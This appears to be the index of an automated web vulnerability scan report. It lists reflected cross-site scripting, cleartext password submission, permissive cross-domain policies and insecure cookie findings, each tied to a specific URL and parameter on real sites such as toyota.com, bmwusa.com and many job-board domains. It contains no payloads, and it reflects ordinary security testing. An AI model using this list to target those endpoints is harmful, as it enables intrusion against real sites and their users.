1.1. http://www.edfed.com/ [name of an arbitrarily supplied request parameter]
1.2. http://www.lawcrossing.com/lcjssearchresults.php [REST URL parameter 1]
1.3. http://www.lawcrossing.com/salarysurvey/lcsalarysurvey.php [REST URL parameter 2]
1.5. http://www.legalauthority.com/signup.php [Referer HTTP header]
1.6. http://www.legalauthority.com/signup.php [name of an arbitrarily supplied request parameter]
2.1. http://www.toyota.com/js/global/global.js [REST URL parameter 1]
2.2. http://www.toyota.com/js/global/global.js [REST URL parameter 2]
2.3. http://www.toyota.com/js/global/global.js [REST URL parameter 3]
3. Cross-site scripting (reflected)
3.1. http://www.100kcrossing.com/ [name of an arbitrarily supplied request parameter]
3.2. http://www.accountingcrossing.com/ [name of an arbitrarily supplied request parameter]
3.3. http://www.accountmanagementcrossing.com/ [name of an arbitrarily supplied request parameter]
3.4. http://www.actuarialcrossing.com/ [name of an arbitrarily supplied request parameter]
3.5. http://www.admincrossing.com/ [name of an arbitrarily supplied request parameter]
3.6. http://www.advertisingcrossing.com/ [name of an arbitrarily supplied request parameter]
3.7. http://www.aerospacecrossing.com/ [name of an arbitrarily supplied request parameter]
3.8. http://www.agriculturalcrossing.com/ [name of an arbitrarily supplied request parameter]
3.9. http://www.aharrisonbarnes.com/ [name of an arbitrarily supplied request parameter]
3.10. http://www.architecturecrossing.com/ [name of an arbitrarily supplied request parameter]
3.11. http://www.auditorcrossing.com/ [name of an arbitrarily supplied request parameter]
3.12. http://www.automotivecrossing.com/ [name of an arbitrarily supplied request parameter]
3.13. http://www.aviationcrossing.com/ [name of an arbitrarily supplied request parameter]
3.14. http://www.bcgsearch.com/searchresults.php [key parameter]
3.15. http://www.bcgsearch.com/searchresults.php [key parameter]
3.16. http://www.bcgsearch.com/searchresults.php [name of an arbitrarily supplied request parameter]
3.17. http://www.bilingualcrossing.com/ [name of an arbitrarily supplied request parameter]
3.18. http://www.biotechcrossing.com/ [name of an arbitrarily supplied request parameter]
3.19. http://www.bluecollarcrossing.com/ [name of an arbitrarily supplied request parameter]
3.20. https://www.bmwusa.com/Secured/Content/Forms/Login.aspx [REST URL parameter 2]
3.21. https://www.bmwusa.com/Secured/Content/Forms/Login.aspx [REST URL parameter 3]
3.22. http://www.businessanalystcrossing.com/ [name of an arbitrarily supplied request parameter]
3.24. http://www.callcentercrossing.com/ [name of an arbitrarily supplied request parameter]
3.25. http://www.chefcrossing.com/ [name of an arbitrarily supplied request parameter]
3.26. http://www.civilengineeringcrossing.com/ [name of an arbitrarily supplied request parameter]
3.27. http://www.clevelcrossing.com/ [name of an arbitrarily supplied request parameter]
3.28. http://www.clinicalresearchcrossing.com/ [name of an arbitrarily supplied request parameter]
3.29. http://www.compliancecrossing.com/ [name of an arbitrarily supplied request parameter]
3.31. http://www.constructioncrossing.com/ [name of an arbitrarily supplied request parameter]
3.32. http://www.consultingcrossing.com/ [name of an arbitrarily supplied request parameter]
3.33. http://www.contractmanagementcrossing.com/ [name of an arbitrarily supplied request parameter]
3.34. http://www.counselingcrossing.com/ [name of an arbitrarily supplied request parameter]
3.35. http://www.cpluspluscrossing.com/ [name of an arbitrarily supplied request parameter]
3.46. http://www.customerservicecrossing.com/ [name of an arbitrarily supplied request parameter]
3.47. http://www.dbacrossing.com/ [name of an arbitrarily supplied request parameter]
3.48. http://www.dentalcrossing.com/ [name of an arbitrarily supplied request parameter]
3.49. http://www.designingcrossing.com/ [name of an arbitrarily supplied request parameter]
3.50. http://www.diversitycrossing.com/ [name of an arbitrarily supplied request parameter]
3.51. http://www.dotnetcrossing.com/ [name of an arbitrarily supplied request parameter]
3.52. http://www.dyn-web.com/bus/terms.html [REST URL parameter 1]
3.53. http://www.dyn-web.com/bus/terms.html [REST URL parameter 1]
3.54. http://www.ecommercecrossing.com/ [name of an arbitrarily supplied request parameter]
3.55. http://www.editingcrossing.com/ [name of an arbitrarily supplied request parameter]
3.56. http://www.educationcrossing.com/ [name of an arbitrarily supplied request parameter]
3.57. http://www.employmentcrossing.com/ [name of an arbitrarily supplied request parameter]
3.58. http://www.energycrossing.com/ [name of an arbitrarily supplied request parameter]
3.59. http://www.engineeringcrossing.com/ [name of an arbitrarily supplied request parameter]
3.60. http://www.entrylevelcrossing.com/ [name of an arbitrarily supplied request parameter]
3.61. http://www.environmentalcrossing.com/ [name of an arbitrarily supplied request parameter]
3.63. http://www.erpcrossing.com/ [name of an arbitrarily supplied request parameter]
3.64. http://www.execcrossing.com/ [name of an arbitrarily supplied request parameter]
3.65. http://www.facilitiescrossing.com/ [name of an arbitrarily supplied request parameter]
3.66. http://www.financialservicescrossing.com/ [name of an arbitrarily supplied request parameter]
3.67. http://www.foodservicescrossing.com/ [name of an arbitrarily supplied request parameter]
3.68. http://www.fundraisingcrossing.com/ [name of an arbitrarily supplied request parameter]
3.69. http://www.giscrossing.com/ [name of an arbitrarily supplied request parameter]
3.70. http://www.governmentcrossing.com/ [name of an arbitrarily supplied request parameter]
3.71. http://www.healthcarecrossing.com/ [name of an arbitrarily supplied request parameter]
3.72. http://www.helpdeskcrossing.com/ [name of an arbitrarily supplied request parameter]
3.73. http://www.hospitalitycrossing.com/ [name of an arbitrarily supplied request parameter]
3.74. http://www.hrcrossing.com/ [name of an arbitrarily supplied request parameter]
3.75. http://www.hvaccrossing.com/ [name of an arbitrarily supplied request parameter]
3.77. http://www.insurcrossing.com/ [name of an arbitrarily supplied request parameter]
3.79. http://www.internshipcrossing.com/ [name of an arbitrarily supplied request parameter]
3.80. http://www.j2eecrossing.com/ [name of an arbitrarily supplied request parameter]
3.81. http://www.journalismcrossing.com/ [name of an arbitrarily supplied request parameter]
3.83. http://www.logisticscrossing.com/ [name of an arbitrarily supplied request parameter]
3.84. http://www.managercrossing.com/ [name of an arbitrarily supplied request parameter]
3.85. http://www.manufacturingcrossing.com/ [name of an arbitrarily supplied request parameter]
3.86. http://www.marketingcrossing.com/ [name of an arbitrarily supplied request parameter]
3.87. http://www.mediajobcrossing.com/ [name of an arbitrarily supplied request parameter]
3.88. http://www.militarycrossing.com/ [name of an arbitrarily supplied request parameter]
3.89. http://www.nursingcrossing.com/ [name of an arbitrarily supplied request parameter]
3.91. http://www.operationscrossing.com/ [name of an arbitrarily supplied request parameter]
3.92. http://www.parttimecrossing.com/ [name of an arbitrarily supplied request parameter]
3.93. http://www.pharmaceuticalcrossing.com/ [name of an arbitrarily supplied request parameter]
3.94. http://www.physicalsecuritycrossing.com/ [name of an arbitrarily supplied request parameter]
3.95. http://www.physicaltherapycrossing.com/ [name of an arbitrarily supplied request parameter]
3.96. http://www.planningcrossing.com/ [name of an arbitrarily supplied request parameter]
3.97. http://www.postdoctoralfellowcrossing.com/ [name of an arbitrarily supplied request parameter]
3.98. http://www.prcrossing.com/ [name of an arbitrarily supplied request parameter]
3.99. http://www.procurementcrossing.com/ [name of an arbitrarily supplied request parameter]
3.100. http://www.productmanagercrossing.com/ [name of an arbitrarily supplied request parameter]
3.101. http://www.projectmanagementcrossing.com/ [name of an arbitrarily supplied request parameter]
3.102. http://www.publicinterestcrossing.com/ [name of an arbitrarily supplied request parameter]
3.103. http://www.publishingcrossing.com/ [name of an arbitrarily supplied request parameter]
3.104. http://www.purchasingcrossing.com/ [name of an arbitrarily supplied request parameter]
3.105. http://www.qaqccrossing.com/ [name of an arbitrarily supplied request parameter]
3.106. http://www.radiocrossing.com/ [name of an arbitrarily supplied request parameter]
3.107. http://www.realestateandlandcrossing.com/ [name of an arbitrarily supplied request parameter]
3.108. http://www.recruitingcrossing.com/ [name of an arbitrarily supplied request parameter]
3.109. http://www.researchingcrossing.com/ [name of an arbitrarily supplied request parameter]
3.110. http://www.retailcrossing.com/ [name of an arbitrarily supplied request parameter]
3.111. http://www.sciencescrossing.com/ [name of an arbitrarily supplied request parameter]
3.112. http://www.scientistcrossing.com/ [name of an arbitrarily supplied request parameter]
3.113. http://www.sellingcrossing.com/ [name of an arbitrarily supplied request parameter]
3.114. http://www.sqlcrossing.com/ [name of an arbitrarily supplied request parameter]
3.115. http://www.teenagercrossing.com/ [name of an arbitrarily supplied request parameter]
3.116. http://www.telecomcrossing.com/ [name of an arbitrarily supplied request parameter]
3.123. http://www.toyotafinancial.com/consumer/tfs.portal [_pageLabel parameter]
3.124. http://www.toyotafinancial.com/consumer/tfs.portal [_pageLabel parameter]
3.125. https://www.toyotafinancial.com/consumer/tfs.portal [_pageLabel parameter]
3.126. https://www.toyotafinancial.com/consumer/tfs.portal [_pageLabel parameter]
3.127. http://www.tradingcrossing.com/ [name of an arbitrarily supplied request parameter]
3.128. http://www.trainingcrossing.com/ [name of an arbitrarily supplied request parameter]
3.129. http://www.transportationcrossing.com/ [name of an arbitrarily supplied request parameter]
3.130. http://www.travelingcrossing.com/ [name of an arbitrarily supplied request parameter]
3.131. http://www.truckingcrossing.com/ [name of an arbitrarily supplied request parameter]
3.132. http://www.tvcrossing.com/ [name of an arbitrarily supplied request parameter]
3.133. http://www.underwritingcrossing.com/ [name of an arbitrarily supplied request parameter]
3.137. http://www.velaw.com/offices/offices.aspx [ctl00%24txtboxSearch parameter]
3.138. http://www.velaw.com/search/search_result.aspx [searchtext parameter]
3.139. http://www.velaw.com/workarea/csslib/ektronCss.ashx [id parameter]
3.140. http://www.velaw.com/workarea/java/ektronJs.ashx [id parameter]
3.141. http://www.veterinarycrossing.com/ [name of an arbitrarily supplied request parameter]
3.142. http://www.volunteercrossing.com/ [name of an arbitrarily supplied request parameter]
3.143. http://www.workathomecrossing.com/ [name of an arbitrarily supplied request parameter]
3.144. http://www.writingcrossing.com/ [name of an arbitrarily supplied request parameter]
3.145. http://www.bcgsearch.com/searchresults.php [Referer HTTP header]
3.146. http://www.bmwusa.com/jsenvconst.ashx [User-Agent HTTP header]
3.147. http://www.employmentauthority.com/ [Referer HTTP header]
3.148. https://www.lawschoolloans.com/lslprivateloan_application.php [Referer HTTP header]
3.149. http://www.legalauthority.com/ [Referer HTTP header]
3.150. http://www.legalauthority.com/signup.php [Referer HTTP header]
3.151. http://www.legalauthority.com/tmlandingpage.php [Referer HTTP header]
3.152. http://www.toyota.com/mobility/index.html [REST URL parameter 1]
4.1. http://www.huffingtonpost.com/crossdomain.xml
4.2. http://www.msnbc.msn.com/crossdomain.xml
4.3. http://www.nytimes.com/crossdomain.xml
4.4. http://www.politico.com/crossdomain.xml
4.5. http://www.usatoday.com/crossdomain.xml
5. Silverlight cross-domain policy
5.1. http://www.usatoday.com/clientaccesspolicy.xml
5.2. http://www.msnbc.msn.com/clientaccesspolicy.xml
6. Cleartext submission of password
6.1. http://www.100kcrossing.com/
6.2. http://www.accountingcrossing.com/
6.3. http://www.accountmanagementcrossing.com/
6.4. http://www.actuarialcrossing.com/
6.5. http://www.admincrossing.com/
6.6. http://www.advertisingcrossing.com/
6.7. http://www.aerospacecrossing.com/
6.8. http://www.agriculturalcrossing.com/
6.9. http://www.architecturecrossing.com/
6.10. http://www.attorneyresume.com/
6.11. http://www.auditorcrossing.com/
6.12. http://www.automotivecrossing.com/
6.13. http://www.aviationcrossing.com/
6.14. http://www.bilingualcrossing.com/
6.15. http://www.biotechcrossing.com/
6.16. http://www.bluecollarcrossing.com/
6.17. http://www.businessanalystcrossing.com/
6.18. http://www.businessdevelopmentcrossing.com/
6.19. http://www.callcentercrossing.com/
6.20. http://www.chefcrossing.com/
6.21. http://www.civilengineeringcrossing.com/
6.22. http://www.clevelcrossing.com/
6.23. http://www.clinicalresearchcrossing.com/
6.24. http://www.compliancecrossing.com/
6.25. http://www.computeraideddesigncrossing.com/
6.26. http://www.constructioncrossing.com/
6.27. http://www.consultingcrossing.com/
6.28. http://www.contractmanagementcrossing.com/
6.29. http://www.counselingcrossing.com/
6.30. http://www.cpluspluscrossing.com/
6.31. http://www.customerservicecrossing.com/
6.32. http://www.dbacrossing.com/
6.33. http://www.dentalcrossing.com/
6.34. http://www.designingcrossing.com/
6.35. http://www.diversitycrossing.com/
6.36. http://www.dotnetcrossing.com/
6.37. http://www.ecommercecrossing.com/
6.38. http://www.editingcrossing.com/
6.39. http://www.educationcrossing.com/
6.40. http://www.employmentcrossing.com/
6.41. http://www.energycrossing.com/
6.42. http://www.engineeringcrossing.com/
6.43. http://www.entrylevelcrossing.com/
6.44. http://www.environmentalcrossing.com/
6.45. http://www.environmentalsafetyhealthcrossing.com/
6.46. http://www.ericmmartin.com/projects/simplemodal/
6.47. http://www.erpcrossing.com/
6.48. http://www.execcrossing.com/
6.49. http://www.facilitiescrossing.com/
6.50. http://www.financialservicescrossing.com/
6.51. http://www.foodservicescrossing.com/
6.52. http://www.fundraisingcrossing.com/
6.53. http://www.giscrossing.com/
6.54. http://www.governmentcrossing.com/
6.55. http://www.graduateschoolloans.com/
6.56. http://www.healthcarecrossing.com/
6.57. http://www.helpdeskcrossing.com/
6.58. http://www.hospitalitycrossing.com/
6.59. http://www.hrcrossing.com/
6.60. http://www.hvaccrossing.com/
6.61. http://www.informationtechnologycrossing.com/
6.62. http://www.insurcrossing.com/
6.63. http://www.intellectualpropertycrossing.com/
6.64. http://www.internshipcrossing.com/
6.65. http://www.j2eecrossing.com/
6.66. http://www.journalismcrossing.com/
6.67. http://www.lawcrossing.com/
6.68. http://www.lawcrossing.com/article/6070/Brooklyn-Law-School/
6.69. http://www.lawcrossing.com/article/6154/Anne-Healy-LIDS/
6.70. http://www.lawcrossing.com/images/banner/lc_bannerforjdj125x125.gif/
6.71. http://www.lawcrossing.com/lcjssearchresults.php
6.72. http://www.lawcrossing.com/salarysurvey/lcsalarysurvey.php
6.73. http://www.lawschoolloans.com/
6.74. http://www.logisticscrossing.com/
6.75. http://www.managercrossing.com/
6.76. http://www.manufacturingcrossing.com/
6.77. http://www.marketingcrossing.com/
6.78. http://www.mediajobcrossing.com/
6.79. http://www.medicalschoolloans.com/
6.80. http://www.militarycrossing.com/
6.81. http://www.nursingcrossing.com/
6.82. http://www.occupationaltherapycrossing.com/
6.83. http://www.operationscrossing.com/
6.84. http://www.parttimecrossing.com/
6.85. http://www.pharmaceuticalcrossing.com/
6.86. http://www.physicalsecuritycrossing.com/
6.87. http://www.physicaltherapycrossing.com/
6.88. http://www.planningcrossing.com/
6.89. http://www.postdoctoralfellowcrossing.com/
6.90. http://www.prcrossing.com/
6.91. http://www.preferredresumes.com/
6.92. http://www.procurementcrossing.com/
6.93. http://www.productmanagercrossing.com/
6.94. http://www.projectmanagementcrossing.com/
6.95. http://www.publicinterestcrossing.com/
6.96. http://www.publishingcrossing.com/
6.97. http://www.purchasingcrossing.com/
6.98. http://www.qaqccrossing.com/
6.99. http://www.radiocrossing.com/
6.100. http://www.realestateandlandcrossing.com/
6.101. http://www.recruitingcrossing.com/
6.102. http://www.researchingcrossing.com/
6.103. http://www.resumeboomer.com/
6.104. http://www.retailcrossing.com/
6.105. http://www.sciencescrossing.com/
6.106. http://www.scientistcrossing.com/
6.107. http://www.sellingcrossing.com/
6.108. http://www.sqlcrossing.com/
6.109. http://www.teenagercrossing.com/
6.110. http://www.telecomcrossing.com/
6.111. http://www.toyota.com/owners/
6.112. http://www.tradingcrossing.com/
6.113. http://www.trainingcrossing.com/
6.114. http://www.transportationcrossing.com/
6.115. http://www.travelingcrossing.com/
6.116. http://www.truckingcrossing.com/
6.117. http://www.tvcrossing.com/
6.118. http://www.underwritingcrossing.com/
6.119. http://www.vault.com/wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP
6.120. http://www.vault.com/wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP
6.121. http://www.veterinarycrossing.com/
6.122. http://www.volunteercrossing.com/
6.123. http://www.woothemes.com/
6.124. http://www.workathomecrossing.com/
6.125. http://www.writingcrossing.com/
7. SSL cookie without secure flag set
7.1. https://www.bmwusa.com/Secured/FrameCheck.aspx
7.2. https://www.lawschoolloans.com/lslprivateloan_application.php
7.3. https://www.bmwusa.com/ScriptResource.axd
7.4. https://www.bmwusa.com/Secured/Content/Forms/Login.aspx
7.5. https://www.bmwusa.com/Secured/NaN
7.6. https://www.bmwusa.com/WebResource.axd
7.7. https://www.bmwusa.com/favicon.ico
7.8. https://www.bmwusa.com/jsenvconst.ashx
7.9. https://www.lowermybills.com/lending/home-refinance/
8. ASP.NET ViewState without MAC enabled
9. Cookie scoped to parent domain
9.1. http://www.directstartv.com/
9.3. http://www.employmentauthority.com/
9.5. http://www.hound.com/gjsearchresult.php
9.6. http://www.lawcrossing.com/
9.7. http://www.lawcrossing.com/article/6070/Brooklyn-Law-School/
9.8. http://www.lawcrossing.com/article/6154/Anne-Healy-LIDS/
9.9. http://www.lawcrossing.com/images/banner/lc_bannerforjdj125x125.gif/
9.10. http://www.lawcrossing.com/lcjssearchresults.php
9.11. http://www.lawcrossing.com/salarysurvey/lcsalarysurvey.php
9.12. http://www.legalauthority.com/
9.13. http://www.legalauthority.com/signup.php
9.14. http://www.opensource.org/licenses/gpl-license.php
9.15. http://www.opensource.org/licenses/mit-license.php
9.16. http://www.resumeboomer.com/
9.17. http://www.toyota.com/byt/pub/init.do
9.18. http://www.answers.com/topic/vinson-elkins-llp
9.19. http://www.buyatoyota.com/NationalLanding.aspx
9.20. http://www.facebook.com/BMWUSA
9.21. http://www.facebook.com/EmploymentXing
9.22. http://www.facebook.com/campaign/impression.php
9.23. http://www.facebook.com/campaign/landing.php
9.24. http://www.facebook.com/pages/JD2B/298408284363
9.25. http://www.facebook.com/piyush.v.bhatt
9.26. http://www.facebook.com/profile.php
9.27. http://www.facebook.com/yahoonews
10. Cookie without HttpOnly flag set
10.1. http://www.100kcrossing.com/
10.2. http://www.accountingcrossing.com/
10.3. http://www.accountmanagementcrossing.com/
10.4. http://www.actuarialcrossing.com/
10.5. http://www.admincrossing.com/
10.6. http://www.advertisingcrossing.com/
10.7. http://www.aerospacecrossing.com/
10.8. http://www.agriculturalcrossing.com/
10.9. http://www.aharrisonbarnes.com/
10.10. http://www.aharrisonbarnes.com/contact-us/script/functions.js
10.12. http://www.aharrisonbarnes.com/hb-course/
10.13. http://www.aharrisonbarnes.com/push-yourself-outside-your-comfort-zone/
10.14. http://www.aharrisonbarnes.com/wp-content/plugins/drop-caps/'dropcaps-no-ie.css'%20screen
10.15. http://www.answers.com/topic/vinson-elkins-llp
10.16. http://www.architecturecrossing.com/
10.17. http://www.attorneyresume.com/
10.18. http://www.auditorcrossing.com/
10.19. http://www.automotivecrossing.com/
10.20. http://www.aviationcrossing.com/
10.21. http://www.bcgsearch.com/
10.22. http://www.bcgsearch.com/browsejobs.php
10.23. http://www.bcgsearch.com/searchresults.php
10.24. http://www.bilingualcrossing.com/
10.25. http://www.biotechcrossing.com/
10.26. http://www.bluecollarcrossing.com/
10.27. http://www.businessanalystcrossing.com/
10.28. http://www.businessdevelopmentcrossing.com/
10.29. http://www.callcentercrossing.com/
10.30. http://www.chefcrossing.com/
10.31. http://www.civilengineeringcrossing.com/
10.32. http://www.clevelcrossing.com/
10.33. http://www.clinicalresearchcrossing.com/
10.34. http://www.compliancecrossing.com/
10.35. http://www.computeraideddesigncrossing.com/
10.36. http://www.constructioncrossing.com/
10.37. http://www.consultingcrossing.com/
10.38. http://www.contractmanagementcrossing.com/
10.39. http://www.counselingcrossing.com/
10.40. http://www.cpluspluscrossing.com/
10.41. http://www.customerservicecrossing.com/
10.42. http://www.dbacrossing.com/
10.43. http://www.dentalcrossing.com/
10.44. http://www.designingcrossing.com/
10.45. http://www.directstartv.com/
10.46. http://www.diversitycrossing.com/
10.47. http://www.dotnetcrossing.com/
10.48. http://www.ecommercecrossing.com/
10.50. http://www.editingcrossing.com/
10.51. http://www.educationcrossing.com/
10.52. http://www.employmentauthority.com/
10.53. http://www.employmentcrossing.com/
10.54. http://www.energycrossing.com/
10.55. http://www.engineeringcrossing.com/
10.56. http://www.entrylevelcrossing.com/
10.57. http://www.environmentalcrossing.com/
10.58. http://www.environmentalsafetyhealthcrossing.com/
10.59. http://www.erpcrossing.com/
10.60. http://www.execcrossing.com/
10.61. http://www.facilitiescrossing.com/
10.62. http://www.financialservicescrossing.com/
10.63. http://www.foodservicescrossing.com/
10.64. http://www.fundraisingcrossing.com/
10.65. http://www.giscrossing.com/
10.66. http://www.governmentcrossing.com/
10.67. http://www.graduateschoolloans.com/
10.68. http://www.healthcarecrossing.com/
10.69. http://www.helpdeskcrossing.com/
10.70. http://www.hospitalitycrossing.com/
10.72. http://www.hound.com/gjsearchresult.php
10.73. http://www.hrcrossing.com/
10.74. http://www.hvaccrossing.com/
10.75. http://www.informationtechnologycrossing.com/
10.76. http://www.insurcrossing.com/
10.77. http://www.intellectualpropertycrossing.com/
10.78. http://www.internshipcrossing.com/
10.79. http://www.j2eecrossing.com/
10.80. http://www.journalismcrossing.com/
10.81. http://www.lawcrossing.com/
10.82. http://www.lawcrossing.com/article/6070/Brooklyn-Law-School/
10.83. http://www.lawcrossing.com/article/6154/Anne-Healy-LIDS/
10.84. http://www.lawcrossing.com/images/banner/lc_bannerforjdj125x125.gif/
10.85. http://www.lawcrossing.com/lcjssearchresults.php
10.86. http://www.lawcrossing.com/salarysurvey/lcsalarysurvey.php
10.87. http://www.lawfirmstaff.com/
10.88. http://www.lawschoolloanreport.org/
10.89. http://www.lawschoolloans.com/
10.90. https://www.lawschoolloans.com/lslprivateloan_application.php
10.91. http://www.legalauthority.com/
10.92. http://www.legalauthority.com/signup.php
10.93. http://www.legalauthority.com/tmlandingpage.php
10.94. http://www.legalauthority.com/tmviewbanner.php
10.95. http://www.legalauthorityfinancial.com/
10.96. http://www.logisticscrossing.com/
10.97. http://www.managercrossing.com/
10.98. http://www.manufacturingcrossing.com/
10.99. http://www.marketingcrossing.com/
10.100. http://www.mediajobcrossing.com/
10.101. http://www.medicalschoolloans.com/
10.102. http://www.militarycrossing.com/
10.103. http://www.nursingcrossing.com/
10.104. http://www.occupationaltherapycrossing.com/
10.105. http://www.opensource.org/licenses/gpl-license.php
10.106. http://www.opensource.org/licenses/mit-license.php
10.107. http://www.operationscrossing.com/
10.108. http://www.parttimecrossing.com/
10.109. http://www.pharmaceuticalcrossing.com/
10.110. http://www.physicalsecuritycrossing.com/
10.111. http://www.physicaltherapycrossing.com/
10.112. http://www.planningcrossing.com/
10.113. http://www.postdoctoralfellowcrossing.com/
10.114. http://www.prcrossing.com/
10.115. http://www.preferredresumes.com/
10.116. http://www.procurementcrossing.com/
10.117. http://www.productmanagercrossing.com/
10.118. http://www.projectmanagementcrossing.com/
10.119. http://www.publicinterestcrossing.com/
10.120. http://www.publishingcrossing.com/
10.121. http://www.purchasingcrossing.com/
10.122. http://www.qaqccrossing.com/
10.123. http://www.radiocrossing.com/
10.124. http://www.realestateandlandcrossing.com/
10.125. http://www.recruitingcrossing.com/
10.126. http://www.researchingcrossing.com/
10.127. http://www.resumeboomer.com/
10.128. http://www.retailcrossing.com/
10.129. http://www.sciencescrossing.com/
10.130. http://www.scientistcrossing.com/
10.131. http://www.sellingcrossing.com/
10.132. http://www.sqlcrossing.com/
10.133. http://www.teenagercrossing.com/
10.134. http://www.telecomcrossing.com/
10.135. http://www.toyota.com/byt/pub/init.do
10.136. http://www.toyota.com/owners/apps/maintenance-guides.do
10.137. http://www.toyota.com/owners/apps/manuals.do
10.138. http://www.tradingcrossing.com/
10.139. http://www.trainingcrossing.com/
10.140. http://www.transportationcrossing.com/
10.141. http://www.travelingcrossing.com/
10.142. http://www.truckingcrossing.com/
10.143. http://www.tvcrossing.com/
10.144. http://www.underwritingcrossing.com/
10.145. http://www.vault.com/wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP
10.146. http://www.veterinarycrossing.com/
10.147. http://www.volunteercrossing.com/
10.148. http://www.workathomecrossing.com/
10.149. http://www.writingcrossing.com/
10.150. http://www.bmwusa.com/
10.151. http://www.bmwusa.com/
10.152. http://www.bmwusa.com/Error_Cookieless.aspx
10.153. http://www.bmwusa.com/ScriptResource.axd
10.154. http://www.bmwusa.com/WebResource.axd
10.155. http://www.bmwusa.com/default.aspx
10.156. http://www.bmwusa.com/favicon.ico
10.157. http://www.bmwusa.com/jsenvconst.ashx
10.159. http://www.bmwusa.com/standard/content/vehicles/2011/1/128iconvertible/default.aspx
10.163. http://www.bmwusa.com/standard/content/vehicles/2011/1/128icoupe/default.aspx
10.167. http://www.bmwusa.com/standard/content/vehicles/2011/1/135iconvertible/default.aspx
10.171. http://www.bmwusa.com/standard/content/vehicles/2011/1/135icoupe/default.aspx
10.174. http://www.bmwusa.com/standard/content/vehicles/2011/1/default.aspx
10.176. http://www.bmwusa.com/standard/content/vehicles/2011/3/328iconvertible/default.aspx
10.180. http://www.bmwusa.com/standard/content/vehicles/2011/3/328icoupe/default.aspx
10.184. http://www.bmwusa.com/standard/content/vehicles/2011/3/328isedan/default.aspx
10.188. http://www.bmwusa.com/standard/content/vehicles/2011/3/328isportswagon/default.aspx
10.192. http://www.bmwusa.com/standard/content/vehicles/2011/3/328ixdrivecoupe/default.aspx
10.197. http://www.bmwusa.com/standard/content/vehicles/2011/3/328ixdrivesedan/default.aspx
10.201. http://www.bmwusa.com/standard/content/vehicles/2011/3/328ixdrivesportswagon/default.aspx
10.206. http://www.bmwusa.com/standard/content/vehicles/2011/3/335dsedan/default.aspx
10.210. http://www.bmwusa.com/standard/content/vehicles/2011/3/335iconvertible/default.aspx
10.214. http://www.bmwusa.com/standard/content/vehicles/2011/3/335icoupe/default.aspx
10.218. http://www.bmwusa.com/standard/content/vehicles/2011/3/335isconvertible/default.aspx
10.222. http://www.bmwusa.com/standard/content/vehicles/2011/3/335iscoupe/default.aspx
10.227. http://www.bmwusa.com/standard/content/vehicles/2011/3/335isedan/default.aspx
10.231. http://www.bmwusa.com/standard/content/vehicles/2011/3/335ixdrivecoupe/default.aspx
10.235. http://www.bmwusa.com/standard/content/vehicles/2011/3/335ixdrivesedan/default.aspx
10.238. http://www.bmwusa.com/standard/content/vehicles/2011/3/3convertibleexplorenew.aspx
10.239. http://www.bmwusa.com/standard/content/vehicles/2011/3/3coupeexplorenew.aspx
10.240. http://www.bmwusa.com/standard/content/vehicles/2011/3/3sedanexplore.aspx
10.241. http://www.bmwusa.com/standard/content/vehicles/2011/3/default.aspx
10.244. http://www.bmwusa.com/standard/content/vehicles/2011/5/528isedan/default.aspx
10.245. http://www.bmwusa.com/standard/content/vehicles/2011/5/528isedan/default.aspx%20
10.250. http://www.bmwusa.com/standard/content/vehicles/2011/5/535igt/default.aspx
10.253. http://www.bmwusa.com/standard/content/vehicles/2011/5/535igt/modelhighlights/default.aspx
10.256. http://www.bmwusa.com/standard/content/vehicles/2011/5/535isedan/default.aspx
10.261. http://www.bmwusa.com/standard/content/vehicles/2011/5/535ixdrivegt/default.aspx
10.262. http://www.bmwusa.com/standard/content/vehicles/2011/5/535ixdrivegt/default.aspx%20
10.267. http://www.bmwusa.com/standard/content/vehicles/2011/5/535ixdrivesedan/default.aspx
10.271. http://www.bmwusa.com/standard/content/vehicles/2011/5/550igt/default.aspx
10.274. http://www.bmwusa.com/standard/content/vehicles/2011/5/550igt/modelhighlights/default.aspx
10.277. http://www.bmwusa.com/standard/content/vehicles/2011/5/550isedan/default.aspx
10.282. http://www.bmwusa.com/standard/content/vehicles/2011/5/550ixdrivegt/default.aspx
10.288. http://www.bmwusa.com/standard/content/vehicles/2011/5/550ixdrivesedan/default.aspx
10.293. http://www.bmwusa.com/standard/content/vehicles/2011/5/5explore.aspx
10.294. http://www.bmwusa.com/standard/content/vehicles/2011/5/5granturismoexplore.aspx
10.295. http://www.bmwusa.com/standard/content/vehicles/2011/5/default.aspx
10.297. http://www.bmwusa.com/standard/content/vehicles/2011/7/740isedan/default.aspx
10.298. http://www.bmwusa.com/standard/content/vehicles/2011/7/740isedan/default.aspx%20
10.304. http://www.bmwusa.com/standard/content/vehicles/2011/7/740lisedan/default.aspx
10.305. http://www.bmwusa.com/standard/content/vehicles/2011/7/740lisedan/default.aspx%20
10.311. http://www.bmwusa.com/standard/content/vehicles/2011/7/750isedan/default.aspx
10.315. http://www.bmwusa.com/standard/content/vehicles/2011/7/750ixdrivesedan/default.aspx
10.316. http://www.bmwusa.com/standard/content/vehicles/2011/7/750ixdrivesedan/default.aspx%20
10.322. http://www.bmwusa.com/standard/content/vehicles/2011/7/750lisedan/default.aspx
10.326. http://www.bmwusa.com/standard/content/vehicles/2011/7/750lixdrivesedan/default.aspx
10.327. http://www.bmwusa.com/standard/content/vehicles/2011/7/750lixdrivesedan/default.aspx%20
10.333. http://www.bmwusa.com/standard/content/vehicles/2011/7/760lisedan/default.aspx
10.339. http://www.bmwusa.com/standard/content/vehicles/2011/7/activehybrid750i/default.aspx
10.340. http://www.bmwusa.com/standard/content/vehicles/2011/7/activehybrid750i/default.aspx%20
10.346. http://www.bmwusa.com/standard/content/vehicles/2011/7/activehybrid750li/default.aspx
10.347. http://www.bmwusa.com/standard/content/vehicles/2011/7/activehybrid750li/default.aspx%20
10.352. http://www.bmwusa.com/standard/content/vehicles/2011/7/allnew7series.aspx
10.353. http://www.bmwusa.com/standard/content/vehicles/2011/7/alpinab7/alpinab7mediagallery.aspx
10.354. http://www.bmwusa.com/standard/content/vehicles/2011/7/alpinab7/alpinab7mediagallery.aspx%20
10.355. http://www.bmwusa.com/standard/content/vehicles/2011/7/alpinab7/default.aspx
10.356. http://www.bmwusa.com/standard/content/vehicles/2011/7/alpinab7/default.aspx%20
10.357. http://www.bmwusa.com/standard/content/vehicles/2011/7/alpinab7/modelhighlightsrd.aspx
10.358. http://www.bmwusa.com/standard/content/vehicles/2011/7/default.aspx
10.359. http://www.bmwusa.com/standard/content/vehicles/2011/x3/default.aspx
10.360. http://www.bmwusa.com/standard/content/vehicles/2011/x3/x3savexplore.aspx
